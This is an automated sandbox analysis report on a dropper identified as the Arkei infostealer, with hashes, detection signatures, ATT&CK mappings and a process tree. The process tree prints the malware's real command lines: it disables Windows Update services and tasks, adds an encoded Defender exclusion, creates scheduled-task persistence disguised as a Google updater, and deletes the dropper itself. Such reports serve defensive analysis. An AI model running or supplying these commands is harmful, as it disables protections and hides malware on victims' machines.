arkei | 641438e98f1ea2def285e5ba391435bf4b96bc95e351cfacf7be1c5729e7e365

Analysis

max time kernel
188s
max time network
195s
platform
windows7_x64
resource
win7-20220414-en
submitted
08/07/2022, 13:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Malware_Dropper.exe
Size

20.5MB
MD5

59d02f49a025628102ce6f5614c88f9f
SHA1

72d54917f8532bb434f645f09ede4e8cf9fcabed
SHA256

641438e98f1ea2def285e5ba391435bf4b96bc95e351cfacf7be1c5729e7e365
SHA512

48dcda93fb6eb51d772b1387eb3ae956259b39d5fb9fd37b6a41e13c23a5885cc2fbcde1bca65c0c64c397faf90d0cc222959594718f33638188ec6adc61511a

Score

10^/10

arkei default discovery evasion exploit spyware stealer suricata

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1236 created 1204	1236	Malware_Dropper.exe	15

suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata
suricata: ET MALWARE Win32/Vidar Variant/Mars CnC Activity (GET)
suricata: ET MALWARE Win32/Vidar Variant/Mars CnC Activity (GET)
suricata
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	yolo.exe

Executes dropped EXE 2 IoCs

pid	Process
628	yolo.exe
1648	UnamDownloader.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
368	takeown.exe
844	icacls.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Deletes itself 1 IoCs

pid	Process
108	cmd.exe

Loads dropped DLL 8 IoCs

pid	Process
1236	Malware_Dropper.exe
1864	Process not Found
1864	Process not Found
1236	Malware_Dropper.exe
1980	Malware_Dropper.exe
1980	Malware_Dropper.exe
1648	UnamDownloader.exe
1648	UnamDownloader.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
368	takeown.exe
844	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1236 set thread context of 1980	1236	Malware_Dropper.exe	29

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	yolo.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	yolo.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1384	sc.exe
1668	sc.exe
1104	sc.exe
1564	sc.exe
1588	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Malware_Dropper.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Malware_Dropper.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1384	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1952	timeout.exe

Modifies registry class 30 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0100000000000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 = 74003100000000008e5405a01100557365727300600008000400efbeee3a851a8e5405a02a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0 = 4c00310000000000e954380110204c6f63616c00380008000400efbe8e5405a0e95438012a000000000200000000020000000000000000000000000000004c006f00630061006c00000014000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0\MRUListEx = ffffffff	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0 = 4a00310000000000e9545901102054656d700000360008000400efbe8e5405a0e95459012a00000001020000000002000000000000000000000000000000540065006d007000000014000000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_Classes\Local Settings	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0\NodeSlot = "2"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 = 52003100000000008e5405a0122041707044617461003c0008000400efbe8e5405a08e5405a02a000000ed0100000000020000000000000000000000000000004100700070004400610074006100000016000000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	UnamDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 = 4c003100000000008e54e0b0100041646d696e00380008000400efbe8e5405a08e54e0b02a00000033000000000003000000000000000000000000000000410064006d0069006e00000014000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	UnamDownloader.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry

T1112

pid	Process
680	reg.exe
1952	reg.exe
1484	reg.exe
1520	reg.exe
568	reg.exe
524	reg.exe
1136	reg.exe
1768	reg.exe
1052	reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
560	powershell.exe
628	yolo.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	628	yolo.exe
Token: SeShutdownPrivilege	1156	powercfg.exe
Token: SeShutdownPrivilege	688	powercfg.exe
Token: SeShutdownPrivilege	524	powercfg.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeTakeOwnershipPrivilege	368	takeown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1648	UnamDownloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	29
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	31
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	31
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	31
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	31
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	32
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	32
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	32
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	32
PID 628 wrote to memory of 560	628	yolo.exe	33
PID 628 wrote to memory of 560	628	yolo.exe	33
PID 628 wrote to memory of 560	628	yolo.exe	33
PID 628 wrote to memory of 1788	628	yolo.exe	35
PID 628 wrote to memory of 1788	628	yolo.exe	35
PID 628 wrote to memory of 1788	628	yolo.exe	35
PID 628 wrote to memory of 1812	628	yolo.exe	36
PID 628 wrote to memory of 1812	628	yolo.exe	36
PID 628 wrote to memory of 1812	628	yolo.exe	36
PID 1812 wrote to memory of 1156	1812	cmd.exe	40
PID 1812 wrote to memory of 1156	1812	cmd.exe	40
PID 1812 wrote to memory of 1156	1812	cmd.exe	40
PID 1788 wrote to memory of 1104	1788	cmd.exe	39
PID 1788 wrote to memory of 1104	1788	cmd.exe	39
PID 1788 wrote to memory of 1104	1788	cmd.exe	39
PID 1788 wrote to memory of 1564	1788	cmd.exe	42
PID 1788 wrote to memory of 1564	1788	cmd.exe	42
PID 1788 wrote to memory of 1564	1788	cmd.exe	42
PID 1788 wrote to memory of 1588	1788	cmd.exe	43
PID 1788 wrote to memory of 1588	1788	cmd.exe	43
PID 1788 wrote to memory of 1588	1788	cmd.exe	43
PID 1812 wrote to memory of 688	1812	cmd.exe	44
PID 1812 wrote to memory of 688	1812	cmd.exe	44
PID 1812 wrote to memory of 688	1812	cmd.exe	44
PID 1788 wrote to memory of 1384	1788	cmd.exe	45
PID 1788 wrote to memory of 1384	1788	cmd.exe	45
PID 1788 wrote to memory of 1384	1788	cmd.exe	45
PID 1788 wrote to memory of 1668	1788	cmd.exe	46
PID 1788 wrote to memory of 1668	1788	cmd.exe	46
PID 1788 wrote to memory of 1668	1788	cmd.exe	46
PID 1788 wrote to memory of 1052	1788	cmd.exe	47
PID 1788 wrote to memory of 1052	1788	cmd.exe	47
PID 1788 wrote to memory of 1052	1788	cmd.exe	47
PID 1788 wrote to memory of 1484	1788	cmd.exe	48
PID 1788 wrote to memory of 1484	1788	cmd.exe	48
PID 1788 wrote to memory of 1484	1788	cmd.exe	48
PID 1812 wrote to memory of 524	1812	cmd.exe	49
PID 1812 wrote to memory of 524	1812	cmd.exe	49
PID 1812 wrote to memory of 524	1812	cmd.exe	49
PID 1788 wrote to memory of 680	1788	cmd.exe	51
PID 1788 wrote to memory of 680	1788	cmd.exe	51
PID 1788 wrote to memory of 680	1788	cmd.exe	51
PID 1788 wrote to memory of 1520	1788	cmd.exe	52
PID 1788 wrote to memory of 1520	1788	cmd.exe	52
PID 1788 wrote to memory of 1520	1788	cmd.exe	52

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Users\Admin\AppData\Local\Temp\yolo.exe
    "C:\Users\Admin\AppData\Local\Temp\yolo.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdQBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeABrACMAPgA="
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:560
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1788
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1104
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1564
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1588
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:1384
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1668
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        5⤵
        Modifies registry key
        
        PID:1052
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        5⤵
        Modifies registry key
        
        PID:1484
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        5⤵
        Modifies security service
        Modifies registry key
        
        PID:680
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        5⤵
        Modifies registry key
        
        PID:1520
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        5⤵
        Modifies registry key
        
        PID:568
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:368
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:844
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:524
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:1952
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:1136
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:1768
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        5⤵
        
        PID:620
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
        5⤵
        
        PID:1488
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
        5⤵
        
        PID:600
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
        5⤵
        
        PID:1296
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
        5⤵
        
        PID:1964
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
        5⤵
        
        PID:1432
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        5⤵
        
        PID:1268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1812
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:688
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:524
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1136
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
      4⤵
      PID:1916
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
        5⤵
        Creates scheduled task(s)
        
        PID:1384
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      4⤵
      PID:1584
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /run /tn "GoogleUpdateTaskMachineQC"
        5⤵
        
        PID:472
- - C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
    "C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:1648
- C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
  2⤵
  - Loads dropped DLL
  - Checks processor information in registry
  PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe" & exit
    3⤵
    - Deletes itself
    PID:108
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:1952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe

Filesize
9.4MB

MD5
d506f597b337bb21d0be9638873e1cae

SHA1
cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

SHA256
729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

SHA512
fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

Download Submit
C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe

Filesize
9.4MB

MD5
d506f597b337bb21d0be9638873e1cae

SHA1
cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

SHA256
729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

SHA512
fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

Download Submit
C:\Users\Admin\AppData\Local\Temp\yolo.exe

Filesize
4.1MB

MD5
990a78c9a169695677130e6f6aaf4ee4

SHA1
d35296a37417a8ae77989aa2728879e79fd89ebf

SHA256
14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

SHA512
0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

Download Submit
C:\Users\Admin\AppData\Local\Temp\yolo.exe

Filesize
4.1MB

MD5
990a78c9a169695677130e6f6aaf4ee4

SHA1
d35296a37417a8ae77989aa2728879e79fd89ebf

SHA256
14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

SHA512
0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

Download Submit
\ProgramData\mozglue.dll

Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\nss3.dll

Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
